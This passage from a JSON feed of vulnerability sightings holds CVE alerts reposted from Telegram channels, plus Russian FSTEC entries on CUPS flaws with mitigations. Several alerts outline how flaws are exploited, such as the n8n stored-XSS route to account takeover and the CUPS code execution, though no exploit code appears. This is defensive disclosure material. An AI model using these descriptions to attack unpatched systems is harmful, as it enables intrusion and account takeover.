"https://t.me/DarkWebInformer_CVEAlerts/13787", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46343\n\ud83d\udd25 CVSS Score: 5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:N)\n\ud83d\udd39 Description: n8n is a workflow automation platform. Prior to version 1.90.0, n8n is vulnerable to stored cross-site scripting (XSS) through the attachments view endpoint. n8n workflows can store and serve binary files, which are accessible to authenticated users. However, there is no restriction on the MIME type of uploaded files, and the MIME type could be controlled via a GET parameter. This allows the server to respond with any MIME type, potentially enabling malicious content to be interpreted and executed by the browser. An authenticated attacker with member-level permissions could exploit this by uploading a crafted HTML file containing malicious JavaScript. When another user visits the binary data endpoint with the MIME type set to text/html, the script executes in the context of the user\u2019s session. This script could send a request to change the user\u2019s email address in their account settings, effectively enabling account takeover. This issue has been patched in version 1.90.0.\n\ud83d\udccf Published: 2025-04-29T04:35:16.684Z\n\ud83d\udccf Modified: 2025-04-29T04:35:16.684Z\n\ud83d\udd17 References:\n1. https://github.com/n8n-io/n8n/security/advisories/GHSA-c8hm-hr8h-5xjw\n2. https://github.com/n8n-io/n8n/pull/14350\n3. https://github.com/n8n-io/n8n/pull/14685\n4. https://github.com/n8n-io/n8n/releases/tag/n8n%401.90.0", "creation_timestamp": "2025-04-29T05:11:28.000000Z"}, {"uuid": "c490189a-570d-46d4-8efe-4049019c63dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-324Q-CWX9-7CRR", "type": "published-proof-of-concept", "source": "Telegram/qw6naPQmOSFEqbc3iRVV_M5dhGETt1a49wBj6uReZM5MuI0", "content": "", "creation_timestamp": "2026-04-14T21:25:30.000000Z"}, {"uuid": "2fca74c2-7189-47a0-a3eb-c8c37f5fd87e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J6M5-2CC7-3WHC", "type": "published-proof-of-concept", "source": "Telegram/GYbH54sRbOOqgznzSrvNbIPKqa8_TpEiUvDUzTYtUUyxy-E", "content": "", "creation_timestamp": "2026-04-15T01:19:21.000000Z"}, {"uuid": "28ab1778-08f9-4800-a56a-38bec28d0a30", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-HRWM-HGMJ-7P9C", "type": "seen", "source": "Telegram/YbTUbIPL_h0mBIC2v2cs-sH-0kBWzIOZ-tc0xqHP7s3YdmQ", "content": "", "creation_timestamp": "2026-04-16T15:20:04.000000Z"}, {"uuid": "678da81c-40db-4b7c-bbd1-919f8d5fec25", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-72C6-FX6Q-FR5W", "type": "seen", "source": "Telegram/YbTUbIPL_h0mBIC2v2cs-sH-0kBWzIOZ-tc0xqHP7s3YdmQ", "content": "", "creation_timestamp": "2026-04-16T15:20:04.000000Z"}, {"uuid": "8c5a2592-de22-49a7-8ca4-e31e1fda03b2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QP4C-XG64-7C6X", "type": "published-proof-of-concept", "source": "Telegram/mxR_Bklpz2ezfl_HBxeq5ePFUKdKDD_SnK62KfKWabwlXIo", "content": "", "creation_timestamp": "2026-04-15T23:25:26.000000Z"}, {"uuid": "af47ef58-27ce-4a32-bb66-e877ed19b0af", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3F6H-2HRP-W5WX", "type": "published-proof-of-concept", "source": "Telegram/mxR_Bklpz2ezfl_HBxeq5ePFUKdKDD_SnK62KfKWabwlXIo", "content": "", "creation_timestamp": "2026-04-15T23:25:26.000000Z"}, {"uuid": "2530c460-295e-4009-90e0-bcd0b63fa762", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-234R-45M2-W6CV", "type": "published-proof-of-concept", "source": "Telegram/M6EVzZe60-ZK2hxHMbXVzi0icuKFKnAtI2GiQ0rZVKguBtE", "content": "", "creation_timestamp": "2026-04-15T23:25:44.000000Z"}, {"uuid": "b1b448b1-c4b0-4110-b653-e06573e70e68", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-558G-H753-6M33", "type": "published-proof-of-concept", "source": "Telegram/M6EVzZe60-ZK2hxHMbXVzi0icuKFKnAtI2GiQ0rZVKguBtE", "content": "", "creation_timestamp": "2026-04-15T23:25:44.000000Z"}, {"uuid": "cb29b3f5-6b91-4c0d-b96f-6856db5e1829", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GQW4-4W2P-838Q", "type": "seen", "source": "Telegram/ajbOyvFAewWZ2L70l5GRQuj2w_RnDYaN4zfpEHfJ_h7NMuY", "content": "", "creation_timestamp": "2026-04-15T23:27:35.000000Z"}, {"uuid": "d27358ce-29d4-4894-b178-77210db582e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G2XJ-4CCH-J276", "type": "seen", "source": "Telegram/jHpVmdM968c9lFQ4KStSRALTqvtLmQ8NC1zLLnKyLbbys0E", "content": "", "creation_timestamp": "2026-04-14T23:21:52.000000Z"}, {"uuid": "f589e67d-28b1-4938-9e2d-7e2491a4d6c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-45XP-XW54-6CV6", "type": "seen", "source": "Telegram/4QaIVP4Z6j7I04jn6w3qCKrQ76Fz4EXtpUCBPkRfgX1dqr4", "content": "", "creation_timestamp": "2026-04-15T01:19:29.000000Z"}, {"uuid": "81c49678-91bd-433f-983d-4367f0eac07c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JH22-FW8W-2V9X", "type": "seen", "source": "Telegram/4QaIVP4Z6j7I04jn6w3qCKrQ76Fz4EXtpUCBPkRfgX1dqr4", "content": "", "creation_timestamp": "2026-04-15T01:19:29.000000Z"}, {"uuid": "36b044ad-b32b-4dae-8d70-b803d7e5126d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78X4-6X83-JX75", "type": "seen", "source": "Telegram/7Ck-SXA1c6V_f9FqVW81avKVix-fYO39OzelndhESQPxXBQ", "content": "", "creation_timestamp": "2026-04-15T19:21:23.000000Z"}, {"uuid": "94dd051a-1fbd-4feb-99a7-a47f9b0f4570", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4XQG-GF5C-GHWQ", "type": "seen", "source": "Telegram/7Ck-SXA1c6V_f9FqVW81avKVix-fYO39OzelndhESQPxXBQ", "content": "", "creation_timestamp": "2026-04-15T19:21:23.000000Z"}, {"uuid": "f22b67f7-2d52-41dd-96b1-ffd328982e16", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9J5H-H4M7-85HX", "type": "published-proof-of-concept", "source": "Telegram/_QjGcBmjsxbZ4Amc1U1V8p7QxKw60FZ8Kw92T8xX9Q9AP7c", "content": "", "creation_timestamp": "2026-04-15T19:22:05.000000Z"}, {"uuid": "5a6717a0-4fdb-4c10-8e55-ff13a08b1f60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-855C-R2VQ-C292", "type": "seen", "source": "Telegram/uDqb5UNOJD19g19jmJKdnJBBrEUml8WxLQrnFn708j03zpg", "content": "", "creation_timestamp": "2026-04-15T23:26:09.000000Z"}, {"uuid": "3ecb8209-c940-4b0f-8dfa-fe97d3f6e7bf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7M5H-W69J-QGGG", "type": "published-proof-of-concept", "source": "Telegram/L_7r3B6HZ1No5mrz6_jolg2h46aKqgVbGrSL49d6iAO6fVY", "content": "", "creation_timestamp": "2026-04-17T01:16:10.000000Z"}, {"uuid": "9aecb876-ba91-4b8e-82eb-0798efc05c7f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-X63Q-3RCJ-HHP5", "type": "published-proof-of-concept", "source": "Telegram/L_7r3B6HZ1No5mrz6_jolg2h46aKqgVbGrSL49d6iAO6fVY", "content": "", "creation_timestamp": "2026-04-17T01:16:10.000000Z"}, {"uuid": "d1200553-2a95-4345-b047-f19a83e18ed9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W46F-JR9F-RGVP", "type": "seen", "source": "Telegram/7o25spvsi10qoVsYDQCR4BvQZf2Pb0MXjY1dtOy-qDOy7tc", "content": "", "creation_timestamp": "2026-04-14T23:22:03.000000Z"}, {"uuid": "909b80cd-4a89-4a5a-a85b-85c4e0077f0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-RMJP-CR27-WPG2", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/18866", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-49014\n\ud83d\udd25 CVSS Score: 5.5 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: jq is a command-line JSON processor. In version 1.8.0 a heap use after free vulnerability exists within the function f_strflocaltime of /src/builtin.c. This issue has been patched in commit 499c91b, no known fix version exists at time of publication.\n\ud83d\udccf Published: 2025-06-19T15:08:04.875Z\n\ud83d\udccf Modified: 2025-06-19T15:08:04.875Z\n\ud83d\udd17 References:\n1. https://github.com/jqlang/jq/security/advisories/GHSA-rmjp-cr27-wpg2\n2. https://github.com/jqlang/jq/commit/499c91bca9d4d027833bc62787d1bb075c03680e", "creation_timestamp": "2025-06-19T15:41:39.000000Z"}, {"uuid": "6cd25655-d549-4cb3-a0bb-4e79b094cec3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P7FW-VJJM-2RWP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19497", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52890\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:H)\n\ud83d\udd39 Description: Incus is a system container and virtual machine manager. When using an ACL on a device connected to a bridge, Incus versions 6.12 and 6.13generates nftables rules that partially bypass security options `security.mac_filtering`, `security.ipv4_filtering` and `security.ipv6_filtering`. This can lead to ARP spoofing on the bridge and to fully spoof another VM/container on the same bridge. Commit 254dfd2483ab8de39b47c2258b7f1cf0759231c8 contains a patch for the issue.\n\ud83d\udccf Published: 2025-06-25T16:51:24.279Z\n\ud83d\udccf Modified: 2025-06-25T16:51:24.279Z\n\ud83d\udd17 References:\n1. https://github.com/lxc/incus/security/advisories/GHSA-p7fw-vjjm-2rwp\n2. https://github.com/lxc/incus/commit/254dfd2483ab8de39b47c2258b7f1cf0759231c8", "creation_timestamp": "2025-06-25T18:06:28.000000Z"}, {"uuid": "26def4aa-3d6a-489d-9855-ec0d783eb856", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MM4C-P35V-7HX3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13550", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-46333\n\ud83d\udd25 CVSS Score: 7.3 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:H/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H)\n\ud83d\udd39 Description: z2d is a pure Zig 2D graphics library. In version 0.6.0, when writing from one surface to another using `z2d.compositor.StrideCompositor.run`, the source surface can be completely out-of-bounds on the x-axis (but not on the y-axis) by way of a negative offset. This results in an overflow of the value controlling the length of the stride. In non-safe optimization modes (consumers compiling with `ReleaseFast` or `ReleaseSmall`), this could potentially lead to invalid memory accesses or corruption. This issue is patched in version 0.6.1.\n\ud83d\udccf Published: 2025-04-25T20:20:22.202Z\n\ud83d\udccf Modified: 2025-04-25T21:42:11.412Z\n\ud83d\udd17 References:\n1. https://github.com/vancluever/z2d/security/advisories/GHSA-mm4c-p35v-7hx3\n2. https://github.com/vancluever/z2d/issues/104\n3. https://github.com/vancluever/z2d/issues/105", "creation_timestamp": "2025-04-25T22:07:29.000000Z"}, {"uuid": "2a67a9d1-e636-4a19-9699-b68fa6cec252", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:2560", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/11503", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1441\n\ud83d\udd25 CVSS Score: 5.5 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: An off-by-one error flaw was found in the udevListInterfacesByStatus() function in libvirt when the number of interfaces exceeds the size of the `names` array. This issue can be reproduced by sending specially crafted data to the libvirt daemon, allowing an unprivileged client to perform a denial of service attack by causing the libvirt daemon to crash.\n\ud83d\udccf Published: 2024-03-11T13:37:54.724Z\n\ud83d\udccf Modified: 2025-04-11T22:03:17.504Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:2560\n2. https://access.redhat.com/security/cve/CVE-2024-1441\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2263841", "creation_timestamp": "2025-04-11T22:51:33.000000Z"}, {"uuid": "91b9faf6-0b42-4823-99a2-00a60d9f5897", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:2449", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13563", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-0406\n\ud83d\udd25 CVSS Score: 6.1 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:H/A:N)\n\ud83d\udd39 Description: A flaw was discovered in the mholt/archiver package. This flaw allows an attacker to create a specially crafted tar file, which, when unpacked, may allow access to restricted files or directories. This issue can allow the creation or overwriting of files with the user's or application's privileges using the library.\n\ud83d\udccf Published: 2024-04-06T16:11:02.643Z\n\ud83d\udccf Modified: 2025-04-26T03:33:36.672Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:2449\n2. https://access.redhat.com/security/cve/CVE-2024-0406\n3. https://bugzilla.redhat.com/show_bug.cgi?id=2257749", "creation_timestamp": "2025-04-26T04:07:45.000000Z"}, {"uuid": "ddf0e011-8f90-494e-848f-a9692cc06f0e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-22MC-7C9M-GV8H", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/12466", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-30357\n\ud83d\udd25 CVSS Score: 7.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:N/I:H/A:H)\n\ud83d\udd39 Description: NamelessMC is a free, easy to use &amp; powerful website software for Minecraft servers. In version 2.1.4 and prior, if a malicious user is leaving spam comments on many topics then an administrator, unable to manually remove each spam comment, may delete the malicious account. Once an administrator deletes the malicious user's account, all their posts (comments) along with the associated topics (by unrelated users) will be marked as deleted. This issue has been patched in version 2.2.0.\n\ud83d\udccf Published: 2025-04-18T15:51:21.670Z\n\ud83d\udccf Modified: 2025-04-18T15:51:21.670Z\n\ud83d\udd17 References:\n1. https://github.com/NamelessMC/Nameless/security/advisories/GHSA-22mc-7c9m-gv8h\n2. https://github.com/NamelessMC/Nameless/commit/7040924e27f99aa486c619a5b4ca809051a1ca7f\n3. https://github.com/NamelessMC/Nameless/releases/tag/v2.2.0", "creation_timestamp": "2025-04-18T15:58:46.000000Z"}, {"uuid": "ff94a12e-0955-4e87-bf31-26a7e5af12b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:6503", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/14620", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-7318\n\ud83d\udd25 CVSS Score: 4.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: A vulnerability was found in Keycloak. Expired OTP codes are still usable when using FreeOTP when the OTP token period is set to 30 seconds (default). Instead of expiring and deemed unusable around 30 seconds in, the tokens are valid for an additional 30 seconds totaling 1 minute.\nA one time passcode that is valid longer than its expiration time increases the attack window for malicious actors to abuse the system and compromise accounts. Additionally, it increases the attack surface because at any given time, two OTPs are valid.\n\ud83d\udccf Published: 2024-09-09T18:50:36.583Z\n\ud83d\udccf Modified: 2025-05-02T21:52:28.896Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:6502\n2. https://access.redhat.com/errata/RHSA-2024:6503\n3. https://access.redhat.com/security/cve/CVE-2024-7318\n4. https://bugzilla.redhat.com/show_bug.cgi?id=2301876", "creation_timestamp": "2025-05-02T22:20:24.000000Z"}, {"uuid": "9edb8c12-05f4-4050-9367-79da7fec8e01", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "4f29edb9-4c4b-44ca-b041-9b050656b6ae", "vulnerability": "GHSA-XX7V-HQXH-CJR9", "type": "seen", "source": "https://t.me/securixy_kz/1284", "content": "", "creation_timestamp": "2026-07-12T22:00:06.408654Z"}, {"uuid": "2b05c667-7ef5-4911-96de-ddf46bf27239", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4852-V58G-6CWF", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3063", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0435\u043c\u043e\u043d\u0430 cupsd \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u0435\u0447\u0430\u0442\u0438 CUPS \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0432\u0445\u043e\u0434\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 \u043f\u0440\u0438 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0435 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430 textWithoutLanguage. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e, \u0434\u0435\u0439\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u043c\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e, \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0432 \u043e\u0447\u0435\u0440\u0435\u0434\u044c \u043f\u0435\u0447\u0430\u0442\u0438 PostScript \u043f\u0440\u0438 \u043f\u043e\u043c\u043e\u0449\u0438 \u0437\u0430\u043f\u0440\u043e\u0441\u0430 Print-Job\n\nBDU:2026-04785\nCVE-2026-34980\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e \u043f\u043e 631 \u0441\u0435\u0442\u0435\u0432\u043e\u043c\u0443 \u043f\u043e\u0440\u0442\u0443;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u044d\u043a\u0440\u0430\u043d\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0434\u043b\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0440\u0435\u0434\u0441\u0442\u0432 \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u043d\u043e\u0439 \u0437\u0430\u0449\u0438\u0442\u044b \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0440\u043a\u0438 \u0444\u0430\u0439\u043b\u043e\u0432, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u0445 \u0438\u0437 \u043d\u0435\u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0437\u0430\u043c\u043a\u043d\u0443\u0442\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0439 \u0441\u0440\u0435\u0434\u044b \u0434\u043b\u044f \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u0444\u0430\u0439\u043b\u0430\u043c\u0438, \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u043d\u044b\u043c\u0438 \u0438\u0437 \u043d\u0435\u0434\u043e\u0432\u0435\u0440\u0435\u043d\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432;\n- \u0441\u0435\u0433\u043c\u0435\u043d\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u0435\u0442\u0438 \u0434\u043b\u044f \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u044f \u0434\u043e\u0441\u0442\u0443\u043f\u0430 \u043a \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u043c\u0443 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c\u0443 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044e;\n- \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 SIEM-\u0441\u0438\u0441\u0442\u0435\u043c \u0434\u043b\u044f \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u043d\u0438\u044f \u0441\u043e\u0431\u044b\u0442\u0438\u0439, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u043e\u0439 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432 Print-Job.\n\n\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u0438 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438:\nhttps://github.com/OpenPrinting/cups/security/advisories/GHSA-4852-v58g-6cwf", "creation_timestamp": "2026-04-08T14:52:05.000000Z"}, {"uuid": "817d39c9-b6e1-4c6b-90f0-f1cbf5516f76", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C54J-2VQW-WPWP", "type": "published-proof-of-concept", "source": "https://t.me/bdufstecru/3064", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0434\u0435\u043c\u043e\u043d\u0430 cupsd \u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u0435\u0447\u0430\u0442\u0438 CUPS \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0430\u043c\u0438 \u043c\u0435\u0445\u0430\u043d\u0438\u0437\u043c\u0430 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u0437\u0432\u043e\u043b\u0438\u0442\u044c \u043d\u0430\u0440\u0443\u0448\u0438\u0442\u0435\u043b\u044e \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u0441\u0432\u043e\u0438 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f root \u043f\u0443\u0442\u0435\u043c \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0441\u0444\u043e\u0440\u043c\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0445 \u0437\u0430\u043f\u0440\u043e\u0441\u043e\u0432\n\nBDU:2026-04786\nCVE-2026-34990\n\n\u041a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0435 \u043c\u0435\u0440\u044b:\n- \u043e\u0433\u0440\u0430\u043d\u0438\u0447\u0435\u043d\u0438\u0435 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 